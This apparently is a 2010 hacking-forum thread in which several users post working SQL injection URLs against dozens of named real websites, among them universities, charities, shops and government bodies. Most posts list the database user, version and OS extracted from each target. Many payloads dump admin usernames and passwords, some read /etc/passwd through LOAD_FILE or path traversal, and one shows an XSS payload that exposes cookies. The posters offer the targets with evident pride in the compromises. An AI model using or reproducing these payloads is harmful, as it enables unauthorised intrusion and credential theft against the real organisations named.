http://www.soldesk-itacademy.co.kr/community/sub5_01.php?boardgubun=view&code=itbank_notice&page=1&id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,concat_ws%280 x3a,user%28%29,database%28%29,version%28%29%29,10, 11,12,13,14,15,16,17,18,19,20%20--+
User: ksheco@localhost
Database: ksheco
Version: 4.0.20
http://gates.fr/europe/email/index.cfm?e_type=friend_brochure&ID=(select+top+1+password+from+users)
OS: Windows NT 5.2 (Build 3790: Service Pack 2)
MSSQL_version: Microsoft SQL Server 2005 - 9.00.4053.00 (X64)
http://classes.dma.ucla.edu/Spring05/157A/cursos/157A/index_visor.php?id=1&ejercicio_id=9&persona_id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8+--+
http://www.sraad.com/print.php?id=-1%20UNION%20SELECt%201,2,3,4,5,concat_ws%280x3a,us er%28%29,database%28%29,version%28%29%29,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 %20--+
User: jaymack@localhost
Database: sraad
Version: 4.1.12a-nt
http://www.lelombard.com/Agenda/Detail.cfm?query_id=(select+top+1+table_name+from+ information_schema.columns+where+column_name=CHAR( 112)%2bchar(97)%2bchar(115)%2bchar(115)%2bchar(119 )%2bchar(111)%2bchar(114)%2bchar(100))--
OS: Windows NT 5.0 (Build 2195: Service Pack 4)
DB_VERSION:Microsoft SQL Server 2000 - 8.00.818 (Intel X86)
http://www.prioninstitute.ca/index.php?page=webpages&menucat=24+and+(select+1+from+(select+count(0),con cat((select+concat(id,0x3a,username,0x3a,password, 0x3a,email)+from+admin_users+limit+0,1),floor(rand (0)*2))+from+information_schema.tables+group+by+2) a)--&id=17&action=displaypage&side=1
http://www.alpharent.gr/gr/news.php?id=1+union+/*!select+1,2,concat(0x7c,user_id,0x7c,user_login,0 x7c,user_password,0x7c,user_name,0x7c,user_email,0 x7c),4+from+users*/--
http://www.keyin.ca/news.asp?id=-52+union+%73%65%6C%65%63%74+1,2,3,concat(uId,0x3a, 0x3a,uFullName,0x3a,0x3a,uEmail,0x3a,0x3a,uPasswor d),5+FROM+tb_users+LIMIT+0,1%23&news=showall
http://web1321.anna.webhoster.ag/detail.php?id=-1%20UNION%20SELECT%201,2,3,4,5,concat_ws%280x3a,us er%28%29,database%28%29,version%28%29%29,7,8,9,10, 11,12,13,14,15%20--+
User: web1321@localhost
Database: usr_web1321_1
Version: 5.0.77
Federation of Bodybuilding and Fitness of Russia
http://www.fbfr.ru/index.php?lan=ru&cont=news&id=-287+and+1=2+union+select+1,2,3,4,concat_ws(char(58 ),@@version,user(),database(),@@version_compile_os ),6,7+--
version : 4.1.22-max
user : whbody1@localhost
database : whbody1
os : unknown-freebsd6.0
http://www.vino-concept.ch/content.php?id=-189+UNION+SELECT+1,2,3,concat(user(),char(58),vers ion(),char(58),database()),5
KENT1994
16.05.2010, 00:21
http://www.slicedgaming.com/blogs.php?staff_id=5 UNION ALL SELECT 1,%String_Col%,3,4,5--
Host IP: 67.205.52.7
Web Server: Apache
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: slicedgaming
nemaniak
16.05.2010, 00:44
www.zhambyl.kz - Official site of the Akimat of Zhambyl Region
http://customers.zhambyl.kz/user_info.php?user_id=-45+union+all+select+1,concat_ws%280x3a,version%28% 29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24+--+
5.0.51a-24+lenny2:wwwrun@localhost:contents
http://www.ac.edu/sports/new_showsport.php?sport_id=-10+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),database(),@@version_compile_os),6,7,8--
PR-5
KENT1994
16.05.2010, 01:17
http://my-symbian.com/s60/software/category.php?fldAuto=30 UNION ALL SELECT 1,%String_Col%,3--
Host IP: 62.129.249.144
Web Server: IdeaWebServer/v0.70
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: my_symbian
http://jansdotter.com/shop/categ.php?category=17 and(select 1 from(select count(*),concat((select (select %String_Col%) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Host IP: 173.45.243.31
Web Server: Apache
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current DB: jansdotter
shop
http://www.yaguza.com/category/category.php?categoryID=58 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10--
Host IP: 69.93.124.182
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: yaguza_test
http://www.inventiondb.com/view.php?id=546 UNION ALL SELECT 1,2,3,4,5,%String_Col%,7,8,9,10--
Host IP: 64.79.143.102
Web Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8k DAV/2 PHP/5.3.0
Powered-by: PHP/5.3.0
DB Server: MySQL unknown ver
Current DB: irdb
http://www.woodworkersworkshop.com/resources/index.php?cat=9 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12 and 'x'='x
Host IP: 72.167.35.10
Web Server: Apache/2.2.8 (Fedora)
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current DB: probe
http://www.templateshunt.com/templatehunt.php?category=56 AND %True_Expression%
Host IP: 65.98.16.26
Web Server: Apache/1.3.36 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.27 OpenSSL/0.9.7a
Powered-by: PHP/4.4.4
DB Server: MySQL >=5
Current DB: temphunt_template
http://www.penfieldbooks.com/category.php?category=4 AND %True_Expression% AND 'x'='x
Host IP: 67.18.15.15
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: penfield4lkjslkf
hackEr ;)
http://biochem.uthscsa.edu/news_article.php?newsID=-23+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database(),@@version_compile_os)
PR-8
TIC-300
Pages in Yandex - 3878
KENT1994
16.05.2010, 02:04
edu
http://www.tolani.edu/tmi/index.php?id=107 UNION ALL SELECT %String_Col%,2,3--
Host IP: 208.115.32.44
Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.25 PHP/5.2.11
Powered-by: PHP/5.2.11
DB Server: MySQL >=5
Current DB: tolanie_tmiphp
http://wsm.wsu.edu/s/index.php?id=744 UNION ALL SELECT %String_Col%,2--
Host IP: 134.121.140.52
Web Server: Microsoft-IIS/7.5
Powered-by: PHP/5.2.13
Powered-by: ASP.NET
DB Server: MySQL unknown ver
Current DB: wsm_articles
http://www.brockport.edu/athletics/football/index.php?id=67 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20 and 'x'='x
Host IP: 137.21.162.30
Web Server: Apache
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: athletics
http://www.research.chop.edu/research/profiles/index.php?ID=927377 and 1=convert(int,%String_Col%) and '1'='1
Host IP: 159.14.240.240
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MSSQL 2000 with error
Current DB: StokesIntranetWeb
http://envs.uoregon.edu/alumni/index.php?id=92 and(select 1 from(select count(*),concat((select (select %String_Col%) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Host IP: 128.223.21.97
Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7l PHP/5.3.0
Powered-by: PHP/5.3.0
DB Server: MySQL >=5
Current DB: alumni
http://vesta.cumc.columbia.edu/dermatology/index.php?id=%27jt165 AND %True_Expression%
Host IP: 156.111.235.215
Web Server: Apache
Powered-by: PHP/5.1.4
DB Server: MySQL
Current DB:
http://www.mauifin.com/fin_info.php?id=-12+union+select+1,concat_ws(0x3a%20,user(),databas e(),version()),3,4,5,6,7--
User: irie_admin@localhost
Version: 5.0.90-community
Database: irie_info
Google PR: 4
PR - 4
http://www.iksbv.nl/english/news.php?ID=-7+union+select+1,2,3,4,concat_ ws(0x3a,version(),datab ase(),user()),6--
Version:4.1.25
User:iksbv
Database:iksbv@localhost
----------------------------------
Pr - 2 :(
http://www.btt-rotterdam.nl/english/news.php?id=-51+union+select+1,2,3,concat_w s(0x3a,version(),data base(),user()),5--
Version:5.0.27-log
User:btt
Database:btt@localhost
os:redhat-linux-gnu
the beast:
http://www.btt-rotterdam.nl/english/news.php?id=-51+union+select+1,2,3,concat_ws(0x3a,loginname,pas s word,privs),5+from+yann sms_members--
----------------------------------
Pr - 4
http://www.ommenleeft.nl/news.php?id=-912+union+select+1,2,concat_ws(0x3a,vers ion(),database(),user() ),4,5,6, 7,8--
Version:5.0.84-0.dotdeb.0-log
Username:ommenlee
Database:ommenlee@localhost
OS:debian-linux-gnu
http://www.ommenleeft.nl/news.php?id=-912+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6 ,7,8+from+grafic oncept_users+limit+0,1--
Russian Red Cross
http://www.rokk.ru/index.php?cat=50&item=-21+and+1=2+union+select+1,concat_ws(char(58),@@ver sion,user(),database(),@@version_compile_os),3,4,5 ,6,7,8,9,10,11,12,13+--
version : 5.1.30
user : rokk@localhost
database : rokk
os : portbld-freebsd6.0
http://wildpartygames.com/product.php?product_id=999999'+union+select+1,2,co ncat_ws(0x3a%20,user(),database(),version()),4,5,6 ,7,8,9/*
User: wpg@localhost
Version: 4.1.22
Database: wpg
Memorial Web Site Script
http://everlastingmemories.org/show_memorial.php?id=139+and+1=2+union+all+select+ 1,2,group_concat(username,char(58),password),4,5,6 ,7,8+from+admin--
http://updikefuneralhome.com/memorial/show_memorial.php?id=332+and+1=2+union+all+select+ 1,2,group_concat(username,char(58),password),4,5,6 ,7,8+from+admin--
www.dashboardwidgets.com/showcase/showcat.php?cid=-43 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9,10,11,12,13,14,15--
http://edu-chem.co.uk/product.php?product_id=-29+union+select+1,2,3,concat_ws(user(),version(),d atabase(),@@version_compile_os),5,6,7,8,9,10,11,12
PR - 6
http://www.karamuzejs.lv/index.php?id=-2+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,version(),data base(),user()),0x71),0x71),4,5--
Version : 4.1.11-standard
Database : karamuzejs_gov_lv_-_karamuzejs
User : muzejnieks@localhost
OS : pc-linux-gnu
+--------------------------------------------+
PR - 5
http://www.tmf.rtu.lv/index.php?id=-6+union+select+1,2,3,4,concat_ws(0x3a,version(),da tab ase(),user())%20,6,7,8,9--
Version : 5.0.27
Database : lv-tmf
User : root@localhost
OS : redhat-linux-gnu
/etc/passwd
http://www.tmf.rtu.lv/index.php?id=-6+union+select+1,2,3,4,LOAD_ FILE(0x2f6574632f706173737764),6,7,8,9--
my first post on Achat :-D
http://www.upennrrtc.org/project/products/view.php?id=-23+union+select+1,2,group_concat(user_username,0x3 a,user_password,0x0b),4,5,6+from+user/*
http://www.euroizol.com.ua/products/view.php?id=-10+union+select+1,2,3,4,5,6,7,group_concat(us_logi n,0x3a,us_pass,0x0b),9,10,11,12,13,14,15,16,17+fro m+ei_users
Skofield
17.05.2010, 02:50
http://www.promethean-editions.com/php/NewsDetail.php?ID=-142+union+select+1,2,3,4,version(),6,7,8,9,0,11,12 ,13,14/*
Database Version: 4.0.27-standard-log
Database name: pelprod
User name: ross@202.191.42.50
-----------------------------------------------------------------------------------------------------
http://www.fundacionapoye.org/php/ampliar_general_indice.php?id=6&clave=-2+union+select+1,version(),3,4,5--
Database Version: 5.0.87-a2hosting-percona
Database name: apoye_fapoye
User name: apoye_edison@localhost
-----------------------------------------------------------------------------------------------------
http://ffg.jeudego.org/php/affichePersonne.php?id=7921'
Database Version: 5.0.51a-24+lenny3
Database name: ffg
User name: lecteur@localhost
PR - 5
http://www.detki.lv/baika.php?id=-126+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt (concat_ws(0x3a,ve rsion(),database(),user()),0x71),0x71)--
Version : 4.1.15-Debian_1ubuntu5-log
Database : c_detki
User : detki@92.240.65.137
+---------------------------------------------+
PR - 5
http://www.lob.lv/lv/aktualitates.php?id=-325+union+select+concat_ws(0x3a,version(),dat abase(),user()),2--
Version : 5.1.25-rc-standard
Database : lob_lv
User : lob@andriseglitis.com
OS : pc-solaris2.10
http://www.lob.lv/lv/aktualitates.php?id=-325+union+select+concat_ws(0x3a,username,user_pass word,user_ level),2+from+ph pbb_users+limit+1,1--
this is the dumbest SQLi, there's a sea of tables and they're all in Latvian :( every table means a trip to translate :mad: in the end I got as far as phpbb and gave up :cool:
http://www.rusbiotech.ru/novice/show.php?id=-440+union+select+1,2,version(),4,5,6,7,8,9,10--
KENT1994
17.05.2010, 15:21
.IR
http://www.teo.ir/gorooha/4/index.php?id=1 and(select 1 from(select count(*),concat((select (select %String_Col%) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Host IP: 91.98.99.162
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: io
http://www.womennews.ir/index.php?id=40 AND %True_Expression%
Host IP: 207.210.118.213
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: ,
Iran....... ;) I hadn't come across any SQLi for it anywhere, so I decided to find some and post it
Skofield
17.05.2010, 15:32
http://www.concellotui.org/php/noticias.php?id=688+union+select+1,2,3,4,version() ,6,7,8,9/*
Database Version: 4.1.22
Database name: qai608
User name: qai608@217.76.131.103
-----------------------------------------------------------------------------------------------------------------
http://www.christianword.org/php/default.php?page_id=view_testimony&id=-499+union+select+1,version(),3,4,5--
Database Version: 5.0.90-community
Database name: mobil0_cwm
User name: mobil0_server1@localhost
----------------------------------------------------------------------------------------------------------------------------
http://www.kummarashalivahana.org/php/greatprofiles_details.php?id=-51+union+select+1,version(),3,4,5,6,7,8--
5.0.67.d7-ourdelta-log
----------------------------------------------------------------------------------------------------------------------------
http://www.wolfdog.org/php/modules.php?op=modload&name=WolfdogShows&newlang=eng&file=successes&id=-8372+union+select+version(),2--
Database Version: 5.0.87-b20-log
Database name: wolfdog_dbase
User name: wolfdog_user@s1.hostpark.pl
-----------------------------------------------------------------------------------------------------------------------------
http://www.timothysmithnetwork.org/courseDetails.php?id=-1652+union+select+1,2,3,4,5,version(),7,8,9,0,11,1 2,13,14,15,16,17,18--
Database Version: 5.0.67-log
Database name: timothy_smith_network
User name: timothy_smith@win.beza.net
http://www.promd.us/news.php?cat=-2+/*!union*/+select+1,CONCAT(userId,0x7c,fName,0x7c,lName,0x7c ,0x7c,userName,0x7c,password,0x7c,email),3,4+from+ promd_admin_users+LIMIT+0,1--&id=7
http://propool.info/articles.php?id=-37+union+select+1,concat_ws(0x3a,username,user_pas sword),3,4,5,6,7+from+vh04971.bb_users+limit+3,1--
http://art.specialradio.ru/print.php?id=-247+union+select+1,concat_ws(0x3a,username,user_pa ssword),3,4,5,6,7,8,9+from+artbaze_specialradio_ru .phpbb_users+limit+1,1--
http://www.sea-angels.ru/index.php?id=-51+union+select+1,concat_ws(0x3a,converge_id,conve rge_pass_hash,converge_pass_salt),3,4,5,6,7,8+from +u46830.fib_sa_members_converge--
http://vn.ru/index.php?id=-100301+union+select+1,concat_ws(0x3a,name,member_l ogin_key),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25+from+sibkray_site.ibf_member s--
http://www.mwe-design.ru/view.php?id=-1978+union+select+1,2,3,4,5,concat_ws(0x3a,user_lo gin,user_pass),7,8,9,10,11+from+u56665_belosn.wp_u sers--
http://www.gisa.ru/info_see.php?id=-1978+union+select+1,table_name,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+inf ormation_schema.tables+limit+61,1--
http://megaspravka.ru/viewcat.php?id=-474+union+select+1,concat_ws%280x3a,username,userp ass%29,3,4,5,6,7+from+nakavkaz_megaspravka.cat_use rs--
http://www.ruscargoservice.ru/auto_info.php?id=-474+UNION+SELECT+1,concat_ws(0x3a,username,user_pa ssword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26+from+u45320.phpbb_users+lim it+1,1--
..::TROYAN::..
17.05.2010, 17:24
http://www.emeraldshoresrealty.net/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.listahouserealty.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.homesbytaber.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://heidelberg-housing.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://empaash.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.barnards-svg.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://gigisexclusive.co.za/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.valuezoneltd.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.french-property-homes.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.talkofnc.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.myholidaysintenerife.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://rd4global.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://wirevip.com/joomla_catalog/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.rieltgarant.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws%280x3a,username, password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jo s_users--
http://www.almenhaj.net/Report.php?linkid=-6878+union+select+1,2,3,4,5,concat_ws(0x3a%20,user (),database(),version()),7,8,9,10,11,12,13--
User: abuzooz@boscgi1903.eigbox.net
Version: 5.0.45-log
Database: future
SQL Inj
http://iep.univ-lille2.fr/presentation/consult.php?num=-121+union+select+1,2,3,concat(user,char(58),passwo rd),5,6,7,8+from+mysql.user&type=agenda
+Include
http://iep.univ-lille2.fr/lib/tele.php?chemin=../../../../../../../../etc/passwd
+XSS
http://iep.univ-lille2.fr/presentation/consult.php?num=-121+union+select+1,2,3,<img src=https://forum.antichat.ru/antichat/pic/logo.gif></img><script>alert(document.cookie)</script>,5,6,7,8+from+mysql.user&type=agenda
PR-7
******* :)
aka_zver
17.05.2010, 19:05
Site: http://www.lahdenmuseot.fi
TIC: 20
PR: 4
Example request: http://www.lahdenmuseot.fi/main.php?id=1'+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat(mi d(concat_ws(0x0b,version(),user(),database(),@@ver sion_compile_os,0x0b),1,63),+floor(rand(0)*2)))--+
version - 5.0.77
user - root@localhost
database - mg:lahdenmuseot
os - redhat-linux-gnu
============================================
Site: http://beta.weetwaar.com
TIC: 0
PR: ?
Example request: http://beta.weetwaar.com/f.php?ID=950+or+(select+count(*)+from+(select+1+un ion+select+2+union+select+3)x+group+by+concat(mid( concat_ws(0x0b,version(),user(),database(),@@versi on_compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - weetwaarco_u@localhost
database - weetwaarco_splace
os - pc-linux-gnu
============================================
Site: http://www.weetwaar.nl
TIC: 0
PR: 2
Example request: http://www.weetwaar.nl/module.php?ID=38296+or+(select+count(*)+from+(sele ct+1+union+select+2+union+select+3)x+group+by+conc at(mid(concat_ws(0x0b,version(),user(),0x0b),1,70) ,+floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch12-log
user - weetwaar@host073.procolix.com
database - weetwaar_nl
os - pc-linux-gnu
============================================
Site: http://www.centres.exeter.ac.uk
TIC: 20
PR: 3
Example request: http://centres.exeter.ac.uk/cls/programmes/module.php?id=-300+union+select+1,2,3,4,5,concat_ws(0x0b,version( ),user(),database(),@@version_compile_os),7,8,9,10 ,11,12,13,14,15,16,17,18,19,20--+
version - 5.0.45-log
user - sobeadm@snowwhite.ex.ac.uk
database - sobe
os - redhat-linux-gnu
============================================
Site: http://www.beoordeelmijnrecruiter.nl
TIC: 0
PR: 3
Example request: http://www.beoordeelmijnrecruiter.nl/module.php?ID=100455+or+(select+count(*)+from+(sel ect+1+union+select+2+union+select+3)x+group+by+con cat(mid(concat_ws(0x0b,version(),user(),database() ,@@version_compile_os,0x0b),1,63),+floor(rand(0)*2 )))--+
version - 5.0.32-Debian_7etch12-log
user - bmr@localhost
database - bmr
os - pc-linux-gnu
Skofield
17.05.2010, 19:48
http://www.nordenhake.com/php/artistsExhibitions.php?id=-99'+union+select+1,2,3,4,5,6,7,8,version(),0,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,7 9,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95, 96,97/*
Database Version: 5.0.45-log
Database name: nordenhake_com
User name: norden_com@n3874@s73.loopia.se
----------------------------------------------------------------------------------------------------------------------------
http://www.artistsincanada.com/php/article.php?id=-339+union+select+1,2,version(),4,5,6,7,8,9,0,11,12 ,13--
Database Version: 5.0.90-community
Database name: artistsincanada_com
User name: artists@localhost
-----------------------------------------------------------------------------------------------------------------------------
http://www.detroitgospel.com/Php/newsdisplay.php?id=-151+union+select+1,version(),3,4,5,6,7,8,9,10--
Database Version: 5.0.83
Database name: detroi1_newsncalendar
User name: detroi1_select@216.157.150.192
-----------------------------------------------------------------------------------------------------------------------------
http://www.peterrake.com/php/display_model.php?id=-78+union+select+1,load_file(0x2f6574632f7061737377 64),3,4,5,6,7,8,9,0,11,12,13+from+mysql.user--
Database Version: 5.0.51a-24+lenny3
Database name: peterrake
User name: www@localhost
aka_zver
17.05.2010, 21:16
Site: http://www.lindespelers.nl
TIC: 0
PR: 2
Example request: http://www.lindespelers.nl/module.php?ID=214+or+(select+count(*)+from+(select +1+union+select+2+union+select+3)x+group+by+concat (mid(concat_ws(0x0b,version(),user(),database(),@@ version_compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - lindespele_u@localhost
database - lindespele_splace
os - pc-linux-gnu
============================================
Site: http://www.et2000.nl
TIC: 0
PR: 2
Example request: http://www.et2000.nl/module.php?ID=974+or+(select+count(*)+from+(select +1+union+select+2+union+select+3)x+group+by+concat (mid(concat_ws(0x0b,version(),user(),database(),@@ version_compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - et2000_splace@localhost
database - et2000_splace
os - pc-linux-gnu
============================================
Site: http://www.oranjenassau.net
TIC: 0
PR: 3
Example request: http://www.oranjenassau.net/module.php?aktie=view&ID=44447+or+(select+count(*)+from+(select+1+union+ select+2+union+select+3)x+group+by+concat(mid(conc at_ws(0x0b,version(),user(),database(),@@version_c ompile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - nassau_splace@localhost
database - nassau_splace
os - pc-linux-gnu
============================================
Site: http://www.splace.nl
TIC: 0
PR: 4
Example request: http://www.splace.nl/module.php?moduleID=1&ID=408+or+(select+count(*)+from+(select+1+union+se lect+2+union+select+3)x+group+by+concat(mid(concat _ws(0x0b,version(),user(),database(),@@version_com pile_os),1,70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - soetendal_splace@localhost
database - soetendal_splace
os - pc-linux-gnu
============================================
Site: http://www.ifs.tu-braunschweig.de
TIC: 0
PR: 3
Example request: http://www.ifs.tu-braunschweig.de/module.php?id=49&action=download&fileid=12'+or+(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat(mid(co ncat_ws(0x0b,version(),user(),database(),@@version _compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.45
user - de@localhost
database - de
os - redhat-linux-gnu
============================================
Site: http://thailengo.com
TIC: 0
PR: 0
Example requests: http://thailengo.com/module.php?id=-1+union+select+1,2,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os)--+
http://thailengo.com/module.php?id=-1+union+select+1,2,group_concat(0x0b,user,0x3a,pas s)+from+users--+
version - 5.0.51a-24+lenny2+spu1
user - thai@localhost
database - thai
os - debian-linux-gnu
============================================
Site: http://www.iai-award.org
TIC: 0
PR: 3
Example request: http://www.iai-award.org/english/module.php?id=-58+union+select+1,concat_ws(0x0b,version(),user(), database(),@@version_compile_os),3,group_concat(0x 0b,table_name),5,6,7,8+from+information_schema.tab les--+
version - 5.0.90-community
user - mille44_iaiaward@localhost
database - mille44_iaiaward
os - pc-linux-gnu
Skofield
17.05.2010, 23:04
http://www.chowk.com/site/articles/index.php?id=-4669+union+select+1,2,3,4,version(),6,7,8,9,0,11,1 2,13,14,15,16,17,18,19,20,21,22--
Database Version: 5.0.90-community
Database name: CHOWK
User name: chdbu@localhost
KENT1994
17.05.2010, 23:35
http://www.arcadi.fr/actualites/index.php?id=%27198 AND %True_Expression%
SHOPS
http://www.thedigitalcamerashop.co.uk/search.php?st=%27category|Storage%20Devices AND %True_Expression%
http://www.trampolining-online.co.uk/shop/products_list.php?cat=%2747&s=%27* AND %True_Expression%
http://www.babybiker.co.uk/category.php?display-category=%274 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8--
http://www.teroberts.co.uk/index.php?UID=%272010051717454666.249.68.231 AND %True_Expression%
http://www.manuli.co.uk/index.php?c=%2776&catParentId=%2740&catName=%27Pad ded%20Envelopes/Bubble%20Mailers AND %True_Expression%
http://www.cypruspropertysales.co.uk/search.php?c=%273 AND %True_Expression%
http://www.manuli.co.uk/index.php?c=%2776&catParentId=%2740&catName=%27Pad ded%20Envelopes/Bubble%20Mailers AND %True_Expression%
http://www.tuscanfeeling.com/areas.php?id=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),4,5,6,7,8--+&s=6
user:tuscan@localhost
version:5.0.90-msl-usrs-sure2+lenny-log
http://www.discoverbajacalifornia.com/new.php?id=-211+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user(),@@version_compile_os),7,8--+
user:db9596_master@64.13.192.25
version:4.1.25-Debian_mt1-log
http://www.cybernation.com/quotationcenter/quoteshow.php?type=subject&id=-1390+union+select+concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),2--+
user:u70707283@cgihost
version:5.0.77-log
